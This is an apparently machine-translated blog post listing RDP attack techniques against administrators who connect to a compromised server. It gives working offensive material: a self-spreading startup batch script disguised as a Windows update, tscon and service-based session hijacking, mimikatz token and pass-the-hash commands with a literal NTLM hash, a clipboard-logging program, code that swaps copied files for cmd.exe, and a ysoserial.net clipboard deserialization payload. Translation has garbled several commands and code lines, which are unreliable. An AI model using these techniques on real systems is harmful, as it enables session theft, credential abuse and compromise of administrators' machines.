Title: rdp usage skills summary

Recently, the administrator in the project got rid of the administrator after rdp was mounted, and thought that he would sort out the use methods for rdp if he had time.: Copying files based on the use of hanging disks is not much. You can decide whether to drag the file or drop the startup item according to the different hanging disks. There are some applications that automatically monitor and copy files, such as: https://github.com/cnucky/DarkGuardianDarkGuardian is a tool used to monitor TSCLIENT (hang disk) after RDP login. When the tool is running in the background, it can automatically obtain the list of files on the hanging disk, download the specified files, copy Trojan files to the startup items on the mounted hard disk, etc.

RDPInception

This method is relatively useless. The principle is to use the bat script to put it in the server startup item/winlogon execution script, and wait for the administrator to hang up the disk and restart the execution command.

@echo off

echo Updating Windows.

@echo off

timeout 1 nul 21

mkdir \\tsclient\c\temp nul 21

mkdir C:\temp nul 21

copy run.bat C:\temp nul 21

copy run.bat \\tsclient\c\temp nul 21

del /q %TEMP%\temp_00.txt nul 21

set dirs=dir /a:d /b /s C:\users\*Startup*

set dirs2=dir /a:d /b /s \\tsclient\c\users\*startup*

echo|%dirs%|findstr /i 'Microsoft\Windows\Start Menu\Programs\Startup''%TEMP%\temp_00.txt'

echo|%dirs2%|findstr /i 'Microsoft\Windows\Start Menu\Programs\Startup''%TEMP%\temp_00.txt'

for /F 'tokens=*' %%a in (%TEMP%\temp_00.txt) DO (

copy run.bat '%%a' nul 21

copy C:\temp\run.bat '%%a' nul 21

copy \\tsclient\c\temp\run.bat '%%a' nul 21

)

del /q %TEMP%\temp_00.txt nul 21

REM if 'WINDOMAIN'='%USERDOMAIN%'( cmd.exe /c calc.exe )

RDP Session Hijacking

The practical command is tscon, which is normal to switch to a different session through a password. However, under system, you can switch different user sessions without using a password. Switch a session to a different session.

This technique is mainly aimed at win7 and above environments. The overall application scenario is: if Windows 2012 or above does not save plaintext by default, you can switch to the target host, or if the current user in the domain is a local user, you can switch to the domain user permissions.

First, use psexec locally to mention the system. (Here you can create system services manually to implement them.) You can also use shift/Utilman backdoor to log in to the desktop without password.

1.psexec

C:\Windows\system32quser

Username Session Name ID Status Idle Time Login Time

administrator rdp-tcp#1 1 is running. 2020/12/14 11:14

test rdp-tcp#0 2 running 1:02 2020/12/14 13:04

C:\Windows\system32tscon 2 rdp-tcp#1

2. Services

quser

sc create sesshijack binpath='cmd.exe /k tscon 2 /dest:rdp-tcp#1'

net start sesshijack

3. mimikatz

privilege:debug

ts:sessions

toekn:elevate

ts:remote /id:2

4. Shift password-free hijacking

com hijacking Shift backdoor in webshell

rdpclip.exe utilization

The RDP service can copy and paste text and files. It is mainly implemented through this rdpclip.exe process. If you want to know the specific operation in copying, you can use ClipSpy to view the changes in the clipboard.

I saw many disclosed methods of using the copyright in ATTCK to obtain the text content of copy, and there is also an idea given in https://research.checkpoint.com/2019/reverse-rdp-attack-code-execution-on-rdp-clients/HOOK RDPClip.exe

1. Shear board monitoring

Every 10 seconds, read the clipboard content and save it locally.

#include exception

#include iostream

#include ostream

#include stdexcept

#include string

#include windows.h

#include fstream

using namespace std;

class RaiiClipboard

{

public:

RaiiClipboard()

{

if (!OpenClipboard(NULL))

throw runtime_error('Can't open clipboard.');

//. or define some custom exception class for clipboard errors.

}

~RaiiClipboard()

{

CloseClipboard();

}

//Ban copy

private:

RaiiClipboard(const RaiiClipboard);

RaiiClipboard operator=(const RaiiClipboard);

};

class RaiiTextGlobalLock

{

public:

explicit RaiiTextGlobalLock(HANDLE hData)

: m_hData(hData)

{

m_psz=static_castconst char*(GlobalLock(m_hData));

if (!m_psz)

throw runtime_error('Can't acquire lock on clipboard text.');

}

~RaiiTextGlobalLock()

{

GlobalUnlock(m_hData);

}

const char* Get() const

{

return m_psz;

}

private:

HANDLE m_hData;

const char* m_psz;

//Ban copy

RaiiTextGlobalLock(const RaiiTextGlobalLock);

RaiiTextGlobalLock operator=(const RaiiTextGlobalLock);

};

string GetClipboardText()

{

RaiiClipboard clipboard;

HANDLE hData=GetClipboardData(CF_TEXT);

if (hData==NULL) {

return '';

//throw runtime_error('Can't get clipboard text.');

}

RaiiTextGlobalLock textGlobalLock(hData);

string text(textGlobalLock.Get());

return text;

}

void SaveData(string data) {

ofstream out('info.txt', ios:app);

if (out.is_open())

{

out data + '\n';

out '------------------------------\n';

out.close();

}

}

int main()

{

static const int kExitOk=0;

static const int kExitError=1;

string data1='';

string data2='';

try

{

while (true) {

data2=GetClipboardText();

if (data1 !=data2) {

cout data2 endl;

SaveData(data2);

}

else {

cout 'waiting for clip acting.' endl;

Sleep(300000);

}

data1=data2;

Sleep(10000);

}

return kExitOk;

}

catch (const exception e)

{

cerr '*** ERROR: ' e.what() endl;

return kExitError;

}

}

According to the Cheesy Rumbles article. You can also use Get-ClipboardContents.ps1 to get clipboard content, and it can be obtained across multiple rdp interfaces.

3924 888 rdpclip.exe x64 3 DMZ2\rasta

inject 3924 x64 smb

powershell-import D:\Tools\Get-ClipboardContents.ps1

powershell Get-ClipboardContents -PollInterval 1

2. Counterattack rdp

How to transfer files to the administrator in reverse without hanging disks? I found two methods online.

1. The Hook GetClipboardData function and DragQueryFileW function are similar. After two days of debugging, I finally found it with the help of all the brothers.

2. Later I thought that I could get the clipboard contents in the previous section, so I could modify the file he copied.

CVE-2019-0887

Li Yongde has the same idea as given in paper. Since wcsrchr(szFile, '\') is used to receive addresses, Microsoft also supports./this kind of path. The reason for the vulnerability is similar to that of winrar path.

Use the detours library to hook the GetClipboardData function and DragQueryFileW function, add file data and paths to achieve the final effect

Replace clipboard file

#include iostream

#include windows.h

#include shlobj.h

int CopyFileToClipboard(char szFileName[]);

int main()

{

CopyFileToClipboard('C:\\windows\\system32\\cmd.exe');

return 0;

}

int CopyFileToClipboard(char szFileName[])

{

UINT uDropEffect;

HGLOBAL hGblEffect;

LPDWORD lpdDropEffect;

DROPFILES stDrop;

HGLOBAL hGblFiles;

LPSTR lpData;

uDropEffect=RegisterClipboardFormat('Preferred DropEffect');

hGblEffect=GlobalAlloc(GMEM_ZEROINIT | GMEM_MOVEABLE | GMEM_DDESHARE, sizeof(DWORD));

lpdDropEffect=(LPDWORD)GlobalLock(hGblEffect);

*lpdDropEffect=DROPEFFECT_COPY;//Copy; Use DROPEFFECT_MOVE for scraping and pasting

GlobalUnlock(hGblEffect);

stDrop.pFiles=sizeof(DROPFILES);

stDrop.pt.x=0;

stDrop.pt.y=0;

stDrop.fNC=FALSE;

stDrop.fWide=FALSE;

hGblFiles=GlobalAlloc(GMEM_ZEROINIT | GMEM_MOVEABLE | GMEM_DDESHARE, sizeof(DROPFILES) + strlen(szFileName) + 2);

lpData=(LPSTR)GlobalLock(hGblFiles);

memcpy(lpData, stDrop, sizeof(DROPFILES));

strcpy(lpData + sizeof(DROPFILES), szFileName);

GlobalUnlock(hGblFiles);

OpenClipboard(NULL);

EmptyClipboard();

SetClipboardData(CF_HDROP, hGblFiles);

SetClipboardData(uDropEffect, hGblEffect);

CloseClipboard();

return 1;

} In this way, after the administrator copies any file from the server and downloads it to the machine, the file will be replaced with cmd.exe

.NET Deserialization

See an idea introduced in `https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2018/december/beware-of-deserialisation-in-.net-methods-and-classes-code-execution-via-paste/`. (I never expected this way to play)

Utilize `https://github.com/pwntester/ysoserial.net`

The utilization process is to replace it with serialized code when pasting the clipboard. Deserialization operation will be triggered when some applications are pasted. Moreover, if the target .NET application is run with higher permissions, it can also be used as permission promotion. (The current user does not have a UAC account password, but the administrator has opened a .NET application before UAC.) ysoserial.exe -p Clipboard -c calc -F System.String

Tested program:

PowerShell ISE

VS

Drawing tools

Any WPF application that utilizes TextBox, PasswordBox, or RichTextBox will also be affected.

RDP pth

User hash login on Windows

Mstsc

Server needs to be enabled Restricted Admin mode, which is enabled by default in Windows 8.1 Windows Server 2012 R2. At the same time, if Win 7 and Windows Server 2008 R are installed, 2871997 and 2973351 patches are also supported; Client needs to support Restricted Admin mode

Turn on Restricted Admin mode

REG ADD 'HKLM\System\CurrentControlSet\Control\Lsa' /v DisableRestrictedAdmin /t REG_DWORD /d 000000000 /f When enabled, use: mstsc.exe /restrictedadmin Login without password, the current user's hash will be used for verification

Mimikatz

mimikatz.exe

privilege:debug

sekurlsa:pth /user:fbiwarning /domain:172.16.142.136 /ntlm:44f9ea6a7743a8ea6f1956384c39887b '/run:mstsc.exe /restrictedadmin'